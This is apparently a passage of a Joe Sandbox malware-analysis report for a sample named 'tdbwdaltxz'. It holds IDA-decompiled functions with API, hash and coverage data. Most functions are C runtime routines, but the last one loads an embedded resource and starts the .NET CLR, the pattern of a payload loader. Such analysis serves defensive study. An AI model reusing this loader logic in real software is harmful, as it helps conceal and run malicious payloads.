                        					__eflags = _t74 & 0x00000082;
                        					if(__eflags != 0) {
                        						__eflags = _t74 & 0x00000040;
                        						if(__eflags == 0) {
                        							_t70 = 0;
                        							__eflags = _t74 & 0x00000001;
                        							if((_t74 & 0x00000001) == 0) {
                        								L10:
                        								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                        								_t92[3] = _t48;
                        								_t92[1] = _t70;
                        								__eflags = _t48 & 0x0000010c;
                        								if((_t48 & 0x0000010c) == 0) {
                        									_t60 = E01062E24();
                        									__eflags = _t92 - _t60 + 0x20;
                        									if(_t92 == _t60 + 0x20) {
                        										L13:
                        										_t62 = E0106FFFD(_t89);
                        										__eflags = _t62;
                        										if(_t62 == 0) {
                        											goto L14;
                        										}
                        									} else {
                        										_t64 = E01062E24();
                        										__eflags = _t92 - _t64 + 0x40;
                        										if(_t92 != _t64 + 0x40) {
                        											L14:
                        											E01070A65(_t92);
                        										} else {
                        											goto L13;
                        										}
                        									}
                        								}
                        								__eflags = _t92[3] & 0x00000108;
                        								if((_t92[3] & 0x00000108) == 0) {
                        									__eflags = 1;
                        									_push(1);
                        									_v8 = 1;
                        									_push( &_a4);
                        									_push(_t89);
                        									_t45 = E0106BEF0(_t70, _t86, _t89, _t92, 1);
                        									_t70 = _t45;
                        									goto L27;
                        								} else {
                        									_t87 = _t92[2];
                        									 *_t92 = _t87 + 1;
                        									_t76 =  *_t92 - _t87;
                        									_v8 = _t76;
                        									_t92[1] = _t92[6] - 1;
                        									__eflags = _t76;
                        									if(__eflags <= 0) {
                        										__eflags = _t89 - 0xffffffff;
                        										if(_t89 == 0xffffffff) {
                        											L22:
                        											_t77 = 0x1080520;
                        										} else {
                        											__eflags = _t89 - 0xfffffffe;
                        											if(_t89 == 0xfffffffe) {
                        												goto L22;
                        											} else {
                        												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t89 >> 5) * 4));
                        											}
                        										}
                        										__eflags =  *(_t77 + 4) & 0x00000020;
                        										if(__eflags == 0) {
                        											goto L25;
                        										} else {
                        											_push(2);
                        											_push(_t70);
                        											_push(_t70);
                        											_push(_t89);
                        											_t45 = E01067780(_t70, _t89, _t92, __eflags) & _t87;
                        											__eflags = _t45 - 0xffffffff;
                        											if(_t45 == 0xffffffff) {
                        												goto L28;
                        											} else {
                        												goto L25;
                        											}
                        										}
                        									} else {
                        										_push(_t76);
                        										_push(_t87);
                        										_push(_t89);
                        										_t70 = E0106BEF0(_t70, _t87, _t89, _t92, __eflags);
                        										L25:
                        										_t45 = _a4;
                        										 *(_t92[2]) = _t45;
                        										L27:
                        										__eflags = _t70 - _v8;
                        										if(_t70 == _v8) {
                        											_t52 = _a4 & 0x000000ff;
                        										} else {
                        											L28:
                        											_t40 =  &(_t92[3]);
                        											 *_t40 = _t92[3] | 0x00000020;
                        											__eflags =  *_t40;
                        											goto L29;
                        										}
                        									}
                        								}
                        							} else {
                        								_t92[1] = 0;
                        								__eflags = _t74 & 0x00000010;
                        								if((_t74 & 0x00000010) == 0) {
                        									_t92[3] = _t74 | 0x00000020;
                        									L29:
                        									_t52 = _t45 | 0xffffffff;
                        								} else {
                        									_t85 = _t74 & 0xfffffffe;
                        									__eflags = _t85;
                        									 *_t92 = _t92[2];
                        									_t92[3] = _t85;
                        									goto L10;
                        								}
                        							}
                        						} else {
                        							_t67 = E010647CC(__eflags);
                        							 *_t67 = 0x22;
                        							goto L6;
                        						}
                        					} else {
                        						_t67 = E010647CC(__eflags);
                        						 *_t67 = 9;
                        						L6:
                        						_t92[3] = _t92[3] | 0x00000020;
                        						_t52 = _t67 | 0xffffffff;
                        					}
                        					return _t52;
                        				} else {
                        					return _t44 | 0xffffffff;
                        				}
                        			}

                        APIs
                        • __ioinit.LIBCMT ref: 0106793F
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: 7aef140c0198f581e698c8ad672e976f625a149ae038e71e5567d6e94c47cc1d
                        • Instruction ID: f43c7404a44f9850386674598a63ed7ce2cd16e4b5c1863153e69f98d1c160e3
                        • Opcode Fuzzy Hash: 7aef140c0198f581e698c8ad672e976f625a149ae038e71e5567d6e94c47cc1d
                        • Instruction Fuzzy Hash: EC411171510B029FD7249BACC891ABE7BEC9F85338F04875DE5E6C62C1E634DA408B21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E0106C92A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                        				void* _t7;
                        				long _t8;
                        				intOrPtr* _t9;
                        				intOrPtr* _t12;
                        				long _t20;
                        				long _t31;
                        
                        				if(_a4 != 0) {
                        					_t31 = _a8;
                        					__eflags = _t31;
                        					if(_t31 != 0) {
                        						_push(__ebx);
                        						while(1) {
                        							__eflags = _t31 - 0xffffffe0;
                        							if(_t31 > 0xffffffe0) {
                        								break;
                        							}
                        							__eflags = _t31;
                        							if(_t31 == 0) {
                        								_t31 = _t31 + 1;
                        								__eflags = _t31;
                        							}
                        							_t7 = HeapReAlloc( *0x1081688, 0, _a4, _t31);
                        							_t20 = _t7;
                        							__eflags = _t20;
                        							if(_t20 != 0) {
                        								L17:
                        								_t8 = _t20;
                        							} else {
                        								__eflags =  *0x1081c20 - _t7;
                        								if(__eflags == 0) {
                        									_t9 = E010647CC(__eflags);
                        									 *_t9 = E01064825(GetLastError());
                        									goto L17;
                        								} else {
                        									__eflags = E0106CE35(_t7, _t31);
                        									if(__eflags == 0) {
                        										_t12 = E010647CC(__eflags);
                        										 *_t12 = E01064825(GetLastError());
                        										L12:
                        										_t8 = 0;
                        										__eflags = 0;
                        									} else {
                        										continue;
                        									}
                        								}
                        							}
                        							goto L14;
                        						}
                        						E0106CE35(_t6, _t31);
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 0xc;
                        						goto L12;
                        					} else {
                        						E01064ED2(_a4);
                        						_t8 = 0;
                        					}
                        					L14:
                        					return _t8;
                        				} else {
                        					return E0106C898(__ebx, __edx, __edi, _a8);
                        				}
                        			}

                        APIs
                        • _malloc.LIBCMT ref: 0106C936
                          • Part of subcall function 0106C898: __FF_MSGBANNER.LIBCMT ref: 0106C8AF
                          • Part of subcall function 0106C898: __NMSG_WRITE.LIBCMT ref: 0106C8B6
                          • Part of subcall function 0106C898: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000000,00000000,00000000,?,01064F6A,00000000,00000000,00000000,00000000,?,01064E22,00000018,0107E060), ref: 0106C8DB
                        • _free.LIBCMT ref: 0106C949
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction ID: dc3f8c792e18c9b39980655d1c4aa36fb946f7055c4604235f5f4dabf39aaf76
                        • Opcode Fuzzy Hash: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction Fuzzy Hash: C611C632905317AFEB322FB8AD4C69E37ECAF142B0B104566F9C9DA140DB358850C7E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E0106D939(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				LONG* _t20;
                        				signed int _t25;
                        				void* _t31;
                        				LONG* _t33;
                        				void* _t34;
                        				void* _t35;
                        
                        				_t35 = __eflags;
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_push(0xc);
                        				_push(0x107e2f0);
                        				E010668F0(__ebx, __edi, __esi);
                        				_t31 = E0106B2AD(__edx, __edi, _t35);
                        				_t25 =  *0x1080e04; // 0xfffffffe
                        				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                        					E01064D39(0xd);
                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                        					_t33 =  *(_t31 + 0x68);
                        					 *(_t34 - 0x1c) = _t33;
                        					__eflags = _t33 -  *0x10806ac; // 0xba2248
                        					if(__eflags != 0) {
                        						__eflags = _t33;
                        						if(__eflags != 0) {
                        							__eflags = InterlockedDecrement(_t33);
                        							if(__eflags == 0) {
                        								__eflags = _t33 - 0x10809a8;
                        								if(__eflags != 0) {
                        									E01064ED2(_t33);
                        								}
                        							}
                        						}
                        						_t20 =  *0x10806ac; // 0xba2248
                        						 *(_t31 + 0x68) = _t20;
                        						_t33 =  *0x10806ac; // 0xba2248
                        						 *(_t34 - 0x1c) = _t33;
                        						InterlockedIncrement(_t33);
                        					}
                        					 *(_t34 - 4) = 0xfffffffe;
                        					E0106D9D5();
                        				} else {
                        					_t33 =  *(_t31 + 0x68);
                        				}
                        				_t38 = _t33;
                        				if(_t33 == 0) {
                        					E0106526F(_t24, _t29, _t31, _t33, _t38, 0x20);
                        				}
                        				return E01066935(_t33);
                        			}










                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __amsg_exit.LIBCMT ref: 0106D966
                        • __lock.LIBCMT ref: 0106D976
                        • InterlockedDecrement.KERNEL32(?), ref: 0106D993
                        • _free.LIBCMT ref: 0106D9A6
                        • InterlockedIncrement.KERNEL32(00BA2248), ref: 0106D9BE
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 1231874560-0
                        • Opcode ID: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction ID: b9d5ca4917e66ae5fc41927d23d8c33c99505101a283fcf1d3cb919651eef13f
                        • Opcode Fuzzy Hash: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction Fuzzy Hash: BD01D672F006229FDB71BFA894047AE7BA9BF05720F140145E8C0B7284C7345540CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E010753DE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t24;
                        				void* _t35;
                        				intOrPtr* _t37;
                        				void* _t38;
                        				void* _t39;
                        
                        				_t39 = __eflags;
                        				_push(0xc);
                        				_push(0x107e4d8);
                        				E010668F0(__ebx, __edi, __esi);
                        				_t35 = E0106B2AD(__edx, __edi, _t39);
                        				_t37 = E01064F0A(8, 1);
                        				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                        				_t40 = _t37;
                        				if(_t37 != 0) {
                        					E010702E6(__ebx, __edx, _t35, _t37, __eflags);
                        					E0106D939(__ebx, __edx, _t35, _t37, __eflags);
                        					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                        					 *(_t37 + 4) =  *(_t35 + 0x68);
                        					E01064D39(0xc);
                        					_t5 = _t38 - 4;
                        					 *_t5 =  *(_t38 - 4) & 0x00000000;
                        					__eflags =  *_t5;
                        					E01070061( *_t37);
                        					 *(_t38 - 4) = 0xfffffffe;
                        					E01075A98();
                        					E01064D39(0xd);
                        					 *(_t38 - 4) = 1;
                        					InterlockedIncrement( *(_t37 + 4));
                        					 *(_t38 - 4) = 0xfffffffe;
                        					E01075AA4();
                        					_t24 = _t37;
                        				} else {
                        					 *((intOrPtr*)(E010647CC(_t40))) = 0xc;
                        					_t24 = 0;
                        				}
                        				return E01066935(_t24);
                        			}









                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __calloc_crt.LIBCMT ref: 01075A15
                          • Part of subcall function 01064F0A: __calloc_impl.LIBCMT ref: 01064F19
                          • Part of subcall function 01064F0A: Sleep.KERNEL32(00000000), ref: 01064F30
                        • __lock.LIBCMT ref: 01075A4B
                        • ___addlocaleref.LIBCMT ref: 01075A57
                        • __lock.LIBCMT ref: 01075A6B
                        • InterlockedIncrement.KERNEL32(?), ref: 01075A7B
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                        • String ID:
                        • API String ID: 2144732038-0
                        • Opcode ID: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction ID: 1043acd6d51f1a49f064483d55129c3b0f617311525d146038d6eae68df51e63
                        • Opcode Fuzzy Hash: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction Fuzzy Hash: 59015A71E41303EEE721BFA498457DC77A0AF65B20F204659E4D4AA2C0CE7559418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061860(WCHAR* _a4) {
                        				signed int _t12;
                        				signed int _t13;
                        				WCHAR* _t14;
                        
                        				_t14 = _a4;
                        				lstrcpyW(_t14, _a4);
                        				_t13 = lstrlenW(_t14);
                        				if(_t13 == 0) {
                        					L6:
                        					if(_t14[_t13] != 0x2e) {
                        						lstrcatW(_t14, L".msi");
                        						return _t14;
                        					} else {
                        						return 0;
                        					}
                        				}
                        				while(1) {
                        					_t12 = _t14[_t13] & 0x0000ffff;
                        					if(_t12 == 0x2e || _t12 == 0x5c || _t12 == 0x2f) {
                        						goto L6;
                        					}
                        					_t13 = _t13 - 1;
                        					if(_t13 != 0) {
                        						continue;
                        					}
                        					goto L6;
                        				}
                        				goto L6;
                        			}







                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: .msi
                        • API String ID: 3050337572-299543723
                        • Opcode ID: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction ID: 2b28503e8b71544921f1983f65dbd0f03f0ede55411e0eb7ba914dc37040f837
                        • Opcode Fuzzy Hash: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction Fuzzy Hash: F7F05536A012146F8F761B9D94084BEBBDCEFD56A23544866F6C4C6100DB34C4A083D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E0106BB78(void* __ecx) {
                        				signed int _v8;
                        				_Unknown_base(*)()* _t5;
                        
                        				_v8 = _v8 & 0x00000000;
                        				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
                        				if(_t5 == 0) {
                        					L3:
                        					return 0;
                        				} else {
                        					_push(0);
                        					_push( &_v8);
                        					if( *_t5() != 0x7a) {
                        						goto L3;
                        					} else {
                        						return 1;
                        					}
                        				}
                        			}






                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 0106BB8A
                        • GetProcAddress.KERNEL32(00000000), ref: 0106BB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCurrentPackageId$kernel32.dll
                        • API String ID: 1646373207-142416881
                        • Opcode ID: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction ID: ea2607807590a304c42193e561659faa15b428e87842daefd1ed2d67b785583c
                        • Opcode Fuzzy Hash: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction Fuzzy Hash: F0E0C272FA030866EB2567F1EC0AF5B369C9700649F100858B197F1080DAB8D20182A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010615A0(void* __ecx, WCHAR* _a4) {
                        				WCHAR* _v8;
                        				WCHAR* _t15;
                        				int _t20;
                        				intOrPtr* _t22;
                        				void* _t27;
                        				int _t29;
                        				intOrPtr* _t32;
                        				WCHAR* _t33;
                        				WCHAR* _t35;
                        				WCHAR* _t36;
                        
                        				_t22 = _a4;
                        				_t27 = 1;
                        				_t32 = _t22;
                        				if(_t22 != 0) {
                        					do {
                        						_t20 = lstrlenW(_t32 + 4);
                        						_t32 =  *_t32;
                        						_t27 = _t27 + 1 + _t20;
                        					} while (_t32 != 0);
                        				}
                        				_t15 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
                        				_t33 = _t15;
                        				_v8 = _t15;
                        				_a4 = _t33;
                        				if(_t22 != 0) {
                        					do {
                        						_t35 = _t22 + 4;
                        						_t29 = lstrlenW(_t35);
                        						_t36 = _a4;
                        						lstrcpynW(_t36, _t35, _t29);
                        						_t33 =  &(_t36[_t29]);
                        						_a4 = _t33;
                        						if( *_t22 != 0) {
                        							 *_t33 = 0x3b;
                        							_t33 =  &(_t33[1]);
                        							_a4 = _t33;
                        						}
                        						_t22 =  *_t22;
                        					} while (_t22 != 0);
                        					_t15 = _v8;
                        				}
                        				 *_t33 = 0;
                        				return _t15;
                        			}














                        APIs
                        • lstrlenW.KERNEL32(?), ref: 010615B9
                        • GetProcessHeap.KERNEL32(00000000), ref: 010615CE
                        • HeapAlloc.KERNEL32(00000000), ref: 010615D5
                        • lstrlenW.KERNEL32(?), ref: 010615F4
                        • lstrcpynW.KERNEL32(?,?,00000000), ref: 01061602
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heaplstrlen$AllocProcesslstrcpyn
                        • String ID:
                        • API String ID: 3934205894-0
                        • Opcode ID: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction ID: 046c8494578fe25ddda53785ce6509faeddc8c0a349deb4468921b35c8b603d3
                        • Opcode Fuzzy Hash: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction Fuzzy Hash: 0B11A376900325EFDB218F98C484A9ABBECEF48350F19406AFE85D7204D775AD418BE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01071597(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				intOrPtr _v12;
                        				int _v20;
                        				void* __ebx;
                        				int _t35;
                        				int _t38;
                        				intOrPtr* _t44;
                        				int _t47;
                        				short* _t49;
                        				intOrPtr _t50;
                        				intOrPtr _t54;
                        				int _t55;
                        				int _t60;
                        				char* _t63;
                        
                        				_t63 = _a8;
                        				if(_t63 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t50 = _a12;
                        				if(_t50 == 0) {
                        					goto L5;
                        				}
                        				if( *_t63 != 0) {
                        					E01065839(_t50,  &_v20, __edx, _a16);
                        					_t35 = _v20;
                        					__eflags =  *(_t35 + 0xa8);
                        					if( *(_t35 + 0xa8) != 0) {
                        						_t38 = E010703F5( *_t63 & 0x000000ff,  &_v20);
                        						__eflags = _t38;
                        						if(_t38 == 0) {
                        							__eflags = _a4;
                        							_t60 = 1;
                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
                        							if(__eflags != 0) {
                        								L21:
                        								__eflags = _v8;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									_t31 = _t54 + 0x70;
                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                        									__eflags =  *_t31;
                        								}
                        								return _t60;
                        							}
                        							L20:
                        							_t44 = E010647CC(__eflags);
                        							_t60 = _t60 | 0xffffffff;
                        							__eflags = _t60;
                        							 *_t44 = 0x2a;
                        							goto L21;
                        						}
                        						_t60 = _v20;
                        						__eflags =  *(_t60 + 0x74) - 1;
                        						if( *(_t60 + 0x74) <= 1) {
                        							L15:
                        							__eflags = _t50 -  *(_t60 + 0x74);
                        							L16:
                        							if(__eflags < 0) {
                        								goto L20;
                        							}
                        							__eflags = _t63[1];
                        							if(__eflags == 0) {
                        								goto L20;
                        							}
                        							L18:
                        							_t60 =  *(_t60 + 0x74);
                        							goto L21;
                        						}
                        						__eflags = _t50 -  *(_t60 + 0x74);
                        						if(__eflags < 0) {
                        							goto L16;
                        						}
                        						__eflags = _a4;
                        						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
                        						_t60 = _v20;
                        						__eflags = _t47;
                        						if(_t47 != 0) {
                        							goto L18;
                        						}
                        						goto L15;
                        					}
                        					_t55 = _a4;
                        					__eflags = _t55;
                        					if(_t55 != 0) {
                        						 *_t55 =  *_t63 & 0x000000ff;
                        					}
                        					_t60 = 1;
                        					goto L21;
                        				}
                        				_t49 = _a4;
                        				if(_t49 != 0) {
                        					 *_t49 = 0;
                        				}
                        				goto L5;
                        			}


















                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010715CB
                        • __isleadbyte_l.LIBCMT ref: 010715F9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 01071627
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0107165D
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction ID: 0d806addd46576e8d9c343e52224aa2292d5002b4fb6148188df7f120cb8224e
                        • Opcode Fuzzy Hash: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction Fuzzy Hash: 0B31CF31E00246EFEB268F69C844BAA7FFAFF45210F1941A9F5A1971D0E731D850CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.7%
                        Dynamic/Decrypted Code Coverage:13.4%
                        Signature Coverage:10.9%
                        Total number of Nodes:119
                        Total number of Limit Nodes:7

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E0040147B() {
                        				void* _v8;
                        				struct HRSRC__* _t4;
                        				long _t10;
                        				struct HRSRC__* _t12;
                        				void* _t16;
                        
                        				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                        				_t12 = _t4;
                        				if(_t12 == 0) {
                        					L6:
                        					ExitProcess(0);
                        				}
                        				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                        				if(_t16 != 0) {
                        					_v8 = LockResource(_t16);
                        					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                        					_t13 = _v8;
                        					if(_v8 != 0 && _t10 != 0) {
                        						L00401000(_t13, _t10); // executed
                        					}
                        				}
                        				FreeResource(_t16);
                        				goto L6;
                        			}









                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                          • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                        • ExitProcess.KERNEL32 ref: 004014E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                        • String ID: v4.0.30319
                        • API String ID: 2372384083-3152434051
                        • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                        • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                        • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                        • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
